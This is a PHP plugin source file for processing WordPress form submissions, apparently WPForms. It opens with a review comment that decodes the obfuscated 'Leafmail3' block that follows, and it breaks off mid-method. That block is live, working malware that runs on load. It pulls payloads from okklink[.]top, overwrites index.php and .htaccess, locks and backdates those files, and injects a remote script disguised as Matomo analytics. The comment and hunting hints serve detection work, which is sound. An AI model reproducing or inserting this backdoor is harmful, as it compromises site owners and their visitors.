<?php
/*
 * NOTE(review): everything from here to the closing PHP tag in front of
 * `class WPForms_Process` is an obfuscated block tagged "Leafmail3". It calls nothing
 * from the plugin and looks injected; treat this copy of the file as compromised and
 * replace it from a known-good plugin package instead of trimming the block by hand.
 *
 * Decoding the escaped strings by hand (re-check with a tool before relying on it), the block:
 *  - assembles function names (curl_*, chmod, touch, mkdir, file_put_contents, md5_file,
 *    unserialize, gzinflate, base64_decode, register_shutdown_function) from octal/hex
 *    fragments and calls them through variables, so a grep for those names finds nothing;
 *  - exits early unless curl_init exists, the SAPI is not CLI, and it gets a non-blocking
 *    exclusive lock on DOCUMENT_ROOT/xmlrpc.php.0;
 *  - empties $_POST, $_REQUEST and $_FILES when the request carries data and neither
 *    WP_USE_THEMES nor WP_ADMIN is defined;
 *  - deletes DOCUMENT_ROOT/.user.ini when it exists;
 *  - compares md5_file() of DOCUMENT_ROOT/index.php and DOCUMENT_ROOT/.htaccess with two
 *    32-character values kept in a file named after the first six hex characters of
 *    md5(HTTP_HOST), looked up under wp-admin and then under the document root;
 *  - on a mismatch, requests data from okklink[.]top (user agent "IN", peer and host
 *    verification set to false), passes the response through unserialize(), and writes
 *    parts of it to index.php, .htaccess, the hash file and a path named in the response;
 *  - switches modes to 0755 before each write and 0555 afterwards, and touch()es the
 *    written files to a time 1363 days in the past;
 *  - registers a shutdown function that prints a <script> loader wrapped in
 *    "<!-- Matomo -->" comments and pointing at the same host.
 *
 * Hunting hints: the "Leafmail3" tag, dense goto labels with escaped string fragments,
 * CURLOPT_SSL_VERIFYPEER set to false next to variable function calls, read-only (0555)
 * index.php/.htaccess with unexpectedly old mtimes, and a stray xmlrpc.php.0 in the web root.
 */
/*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . 
"\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . 
"\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . 
$HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= 
"\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if 
($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . 
$HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: 
$u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . 
$osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto 
sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/**
* Process and validate form entries.
*
* @since 1.0.0
*/
class WPForms_Process {
/**
* Store errors.
*
* @since 1.0.0
*
* @var array
*/
public $errors;
/**
* Store spam errors.
*
* @since 1.8.3
*
* @var array
*/
public $spam_errors;
/**
* Spam reason.
*
* @since 1.8.3
*
* @var string
*/
public $spam_reason;
/**
* Confirmation message.
*
* @var string
*/
public $confirmation_message;
/**
* Current confirmation.
*
* @since 1.6.9
*
* @var array
*/
private $confirmation;
/**
* Store formatted fields.
*
* @since 1.0.0
*
* @var array
*/
public $fields;
/**
* Store the ID of a successful entry.
*
* @since 1.2.3
*
* @var int
*/
public $entry_id = 0;
/**
* Form data and settings.
*
* @since 1.4.5
*
* @var array
*/
public $form_data;
/**
* If a valid return hash was processed.
*
* @since 1.4.5
*
* @var bool
*/
public $valid_hash = false;
/**
* Primary class constructor.
*
* @since 1.0.0
*/
public function __construct() {
	// Instantiating the processor is what attaches its request listeners.
	$this->hooks();
}
/**
* Register hooks.
*
* @since 1.8.3
*/
private function hooks() {
	// Hook name => method on this object, registered in this order.
	// The `nopriv` AJAX action is the one WordPress fires for logged-out visitors, so
	// `ajax_submit` is reachable without authentication and must treat its input as untrusted.
	$listeners = [
		'wp'                            => 'listen',
		'wp_ajax_wpforms_submit'        => 'ajax_submit',
		'wp_ajax_nopriv_wpforms_submit' => 'ajax_submit',
	];

	foreach ( $listeners as $hook_name => $method ) {
		add_action( $hook_name, [ $this, $method ] );
	}
}
/**
* Listen to see if this is a return callback or a posted form entry.
*
* @since 1.0.0
*/
public function listen() {
	// A request body larger than post_max_size is handled elsewhere; stop here.
	if ( $this->post_max_size_overflow() ) {
		return;
	}

	// No nonce is checked in this method; process() runs its own nonce check further down.
	// phpcs:disable WordPress.Security.NonceVerification
	if ( ! empty( $_GET['wpforms_return'] ) ) {
		$return_hash = sanitize_text_field( wp_unslash( $_GET['wpforms_return'] ) );

		// Additional redirect trigger for addons.
		$this->entry_confirmation_redirect( '', $return_hash );
	}

	$form_id = 0;

	if ( ! empty( $_POST['wpforms']['id'] ) ) {
		$form_id = absint( $_POST['wpforms']['id'] );
	}

	// Not a form submission.
	if ( 0 === $form_id ) {
		return;
	}

	// The raw submission is handed over unsanitized; validation happens inside process().
	// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
	$this->process( wp_unslash( $_POST['wpforms'] ) );
	// phpcs:enable WordPress.Security.NonceVerification

	// Only AMP submissions get a JSON reply from here.
	if ( ! wpforms_is_amp() ) {
		return;
	}

	if ( ! empty( $this->errors[ $form_id ] ) ) {
		$form_errors = $this->errors[ $form_id ];
		$message     = $form_errors['header'];

		if ( ! empty( $form_errors['footer'] ) ) {
			$message .= ' ' . $form_errors['footer'];
		}

		// Send 400 Bad Request when there are errors.
		wp_send_json(
			[
				'message' => $message,
			],
			400
		);

		return;
	}

	wp_send_json(
		[
			'message' => $this->get_confirmation_message( $this->form_data, $this->fields, $this->entry_id ),
		],
		200
	);
}
/**
* Process the form entry.
*
* @since 1.0.0
* @since 1.6.4 Added hCaptcha support.
*
* @param array $entry Form submission raw data ($_POST).
*/
public function process( $entry ) {
// Order of work in this method: reset state, load the published form, run the `before` and
// per-field validate hooks, stop on initial errors, run the nonce / honeypot / token checks,
// run the format and process hooks, run the time-limit and spam checks, then save the entry
// and payment, send notifications, fire the completion hooks and redirect.
$this->errors = [];
$this->fields = [];
/* @var int $form_id Annotate the type explicitly. */
$form_id = absint( $entry['id'] );
$form = wpforms()->get( 'form' )->get( $form_id );
// Validate form is real and active (published).
if ( ! $form || $form->post_status !== 'publish' ) {
$this->errors[ $form_id ]['header'] = esc_html__( 'Invalid form.', 'wpforms-lite' );
return;
}
/**
* Filter form data obtained during form process.
*
* @since 1.5.3
*
* @param array $form_data Form data.
* @param array $entry Form entry.
*/
$this->form_data = (array) apply_filters( 'wpforms_process_before_form_data', wpforms_decode( $form->post_content ), $entry );
// A filter callback can return anything, so the two keys the rest of the method relies on are checked.
if ( ! isset( $this->form_data['fields'], $this->form_data['id'] ) ) {
// The same ID goes to the log and, for privileged users, to the screen, so both can be correlated.
$error_id = uniqid( '', true );
// Logs missing form data.
